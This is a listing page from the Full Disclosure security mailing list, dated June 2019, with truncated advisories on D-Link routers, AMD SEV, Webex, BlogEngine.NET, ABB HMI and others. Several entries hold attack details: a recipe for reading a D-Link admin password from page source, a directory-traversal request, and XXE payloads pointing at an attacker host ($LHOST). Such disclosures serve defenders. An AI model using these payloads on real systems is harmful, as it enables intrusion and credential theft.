Full Disclosure

A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.

D-LINK admin password in plain text if "user" or "User" use blank password

25 June, 2019 - 13:03

Posted by Marty on Jun 25

The problem is in the following models:

DIR-652
DIR-615
DIR-827
DIR-615
DIR-657
DIR-825

If you log in to the web interface as "User" or "user", and navigate to the URL:

http://<ip>:port/wizard_wan.asp

in the web page source:

view-source:<ip>:port/wizard_wan.asp

scroll down the page and bang:

administrator password in plain text

ports: 8080 or 8081.


AMD-SEV: Platform DH key recovery via invalid curve attack (CVE-2019-9836)

25 June, 2019 - 13:03

Posted by Cfir Cohen via Fulldisclosure on Jun 25

Overview
========
AMD Secure Encrypted Virtualization (SEV) is a hardware memory encryption
feature. SEV protects guest virtual machines from the hypervisor, provides
confidentiality guarantees at runtime and remote attestation at launch
time. See [1] for details. SEV key management code runs inside the Platform
Security Processor (PSP) [2].

The SEV elliptic-curve (ECC) implementation was found to be vulnerable to
an invalid curve attack. At...

Webex meetings are vulnerable to mitm

24 June, 2019 - 22:24

Posted by RDX Guy on Jun 24

https://pankajupadhyay.in/2019/06/24/webex-meetings-are-vulnerable-to-mitm/

"In my free time, I was looking at some Android applications and noticed
that I was able to intercept SSL traffic for Webex Meetings app. When
explored it further, I found that Webex Meetings mobile app accepts
self-signed certificates. Also there is no certificate pinning enabled.

This makes Webex meet app vulnerable to Man in the middle attack.

Users of this...

BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing

24 June, 2019 - 22:23

Posted by aaron bishop on Jun 24

*CVE-2019-10717* - A Directory Traversal + Directory Listing exists on
BlogEngine.Net 3.3.7 and earlier through the *path* parameter used by the
/api/filemanager endpoint. A request such as:

https://$HOST/api/filemanager?path=*%2F..%2f..%2f*

Discloses the contents of the application root:

....
{
"IsChecked": false,
"SortOrder": 25,
"Created": "5/26/2018 1:53:02 PM",
"Name":...

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-012
CVE-2019-7228
ABBVU-IAMF-1902007

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...

Fortinet FortiCam FCM-MB40 Vulnerabilities

24 June, 2019 - 02:06

Posted by XORcat on Jun 24

Original posting: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

## Background

In March of 2019 I discovered five vulnerabilities in Fortinet's
FortiCam FCM-MB40[1] product.

Part-way through disclosing this vulnerability, I discovered that the
FCM-MB40 is manufactured by a company called Dynacolor Inc[2], which
calls the product "Q2-H"[3].

The FortiCam FCM-MB40 software version which I found these
vulnerabilities in was...

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

24 June, 2019 - 02:06

Posted by Apple Product Security via Fulldisclosure on Jun 24

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

AirPort Base Station Firmware Update 7.8.1 is now available and
addresses the following:

AirPort Base Station Firmware
Available for: AirPort Express, AirPort Extreme, and AirPort Time
Capsule base stations with 802.11n
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8581: Lucio Albornoz...

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-011
CVE-2019-7232
ABBVU-IAMF-1902009

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
========================================================================

Identifiers
-----------
XL-19-010
CVE-2019-7226
ABBVU-IAMF-1902005

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability
========================================================================

Identifiers
-----------
XL-19-009
CVE-2019-7225
ABBVU-IAMF-1902004
ABBVU-IAMF-1902011
ABBVU-IAMF-1902002

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
The affected...

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
========================================================================

Identifiers
-----------
XL-19-008
CVE-2019-7227
ABBVU-IAMF-1902006

CVSS Score
----------
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server fails...

XL-19-006 - ABB HMI Outdated Software Components

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-006 - ABB HMI Outdated Software Components
========================================================================

Identifiers
-----------
XL-19-006
ABBVU-IAMF-1902001
ABBVU-IAMF-1902010

CVSS Score
----------
7.1 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses outdated software components that are...

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-007
CVE-2019-7231
ABBVU-IAMF-1902010

CVSS Score
----------
6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server is...

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability
========================================================================

Identifiers
-----------
XL-19-005
CVE-2019-7229
ABBVU-IAMF-1902003
ABBVU-IAMF-1902012

CVSS Score
----------
8.3 (AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses two...

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP...

Re: Multiple Cross-site Scripting Vulnerabilities in Shopware 5.5.6

24 June, 2019 - 02:04

Posted by Henri Salo on Jun 24

Please use CVE-2019-12935 for this vulnerability.

Quarking Password Manager 3.1.84 - Clickjacking Vulnerability

24 June, 2019 - 02:04

Posted by gionreale on Jun 24

Quarking Password Manager 3.1.84 suffers from a clickjacking
vulnerability caused by allowing * within web_accessible_resources. An
attacker can take advantage of this vulnerability and cause significant
harm.

CVE-2019-12880

BlogEngine.Net XXE issues

24 June, 2019 - 02:03

Posted by aaron bishop on Jun 24

BlogEngine.NET, versions 3.3.7 and earlier, are vulnerable to an
Out-of-band XXE attack through syndication.axd and pingback.axd.

*syndication.axd* accepts an external XML as the value for apml through a
request such as:

http://$RHOST/blog/syndication.axd?*apml=http://$LHOST/oob.xml*

*pingback.axd* will parse a POST with an XML body, such as:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd"...

PC-Doctor Toolbox before 7.3 has an Uncontrolled Search Path Element

21 June, 2019 - 17:49

Posted by Micah Wiseley on Jun 21

Full Disclosure

I. VULNERABILITY
-------------------------
Uncontrolled search path element vulnerability in PC-Doctor Toolbox prior
to version 7.3 allows local users to gain privileges and conduct DLL
hijacking attacks via a trojan horse DLL located in an unsecured directory
which has been added to the PATH environment variable.

II. CVE REFERENCE
-------------------------
CVE-2019-12280

III. VENDOR
-------------------------
PC-Doctor, Inc....

CVE-2019-12323 / HC10 HC.Server Service 10.14 / Remote Invalid Pointer Write

18 June, 2019 - 03:27

Posted by hyp3rlinx on Jun 18

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
[+] ISR: ApparitionSec

[Vendor]
www.hostingcontroller.com

[Product]
HC10 HC.Server Service 10.14

HC10 is a unified hosting automation control panel for web hosts and Cloud
based service providers to manage both Windows & Linux servers
simultaneously as part...